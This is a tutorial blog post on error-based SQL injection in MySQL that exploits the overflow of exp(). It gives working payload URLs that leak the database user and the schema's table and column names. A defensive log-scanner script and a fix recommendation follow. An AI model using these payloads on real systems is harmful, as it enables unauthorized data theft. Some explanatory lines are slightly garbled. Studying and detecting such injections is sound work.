Error Based Sql Injection With Exponential Method

Hello guys, in the previous post I covered basic error-based SQL injection. In this post I will cover error-based SQL injection using the exponential method and mathematical operations. While going through the functions in MySQL, I became interested in the mathematical functions. They too must use some data type to hold their values, so I went on testing for functions that would cause overflow errors, and I found that exp() causes an overflow error when we pass it a large value above 709.

POC 1:

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

The exp function is the opposite of the log functions of MySQL. To briefly explain their functionality: log and ln both return the natural logarithm, that is, the logarithm to the base e. Commonly, e is approximated to:

POC 2:

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

Exponentials are the opposite of logarithms. The exp function would do the exact opposite for us.

Injection:

  • Extracting database name
    http://127.0.0.1/?id=1' or exp(~(select*from(select user())x))-- -
  • Extracting table name and column name in one shot.
    http://127.0.0.1/?id=1' or exp(~(select * from(select group_concat('<li>',table_name,'::::',column_name) from information_schema.columns where table_schema=database())x))-- -

Yeah, we are done: we injected using the exponential method.
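From the defender's side, the expressions shown above leave a recognizable shape in web access logs. The following is an added example, not code from the original post: a small log scanner that flags exp() calls whose argument is a bitwise-NOT subquery or a literal past the DOUBLE limit. The function names, labels and sample log lines are assumptions made for illustration.

```python
import math
import re
import sys
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# ln(DBL_MAX) ~= 709.78: exp() of anything larger cannot fit in a DOUBLE,
# which is why POC 1 works for 709 and fails with ERROR 1690 for 710.
EXP_OVERFLOW_AT = math.log(sys.float_info.max)

# Matches  exp( <numeric literal> )  or  exp( ~( select ...
EXP_CALL = re.compile(
    r"\bexp\s*\(\s*(?:(?P<num>\d+(?:\.\d+)?)\s*\)|(?P<sub>~\s*\(\s*select\b))",
    re.IGNORECASE,
)
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def classify(target: str) -> Optional[str]:
    """Label a request target that carries an exp() overflow expression."""
    decoded = re.sub(r"\s+", " ", unquote_plus(target))
    for m in EXP_CALL.finditer(decoded):
        if m.group("sub"):
            return "exp-overflow-subquery"
        if float(m.group("num")) > EXP_OVERFLOW_AT:
            return "exp-overflow-literal"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, label) for every suspicious log line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        req = REQUEST.search(line)
        label = classify(req.group("target")) if req else None
        if label:
            hits.append((n, label))
    return hits


# Constructed sample access-log lines (hypothetical, not from the original post).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=1%27%20or%20exp(~(select*from(select%20user())x))--%20- HTTP/1.1" 500 231',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /?id=1%20and%20EXP%28710%29 HTTP/1.1" 500 231',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /calc?expr=exp(2) HTTP/1.1" 200 40',
]
```

A scanner like this is a detection aid only; the fix for the injection itself is to bind `id` as a query parameter and to stop returning raw database errors such as ERROR 1690 to the client.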

Thanks for reading, guys. Keep learning 😉

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My area of expertise includes Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more...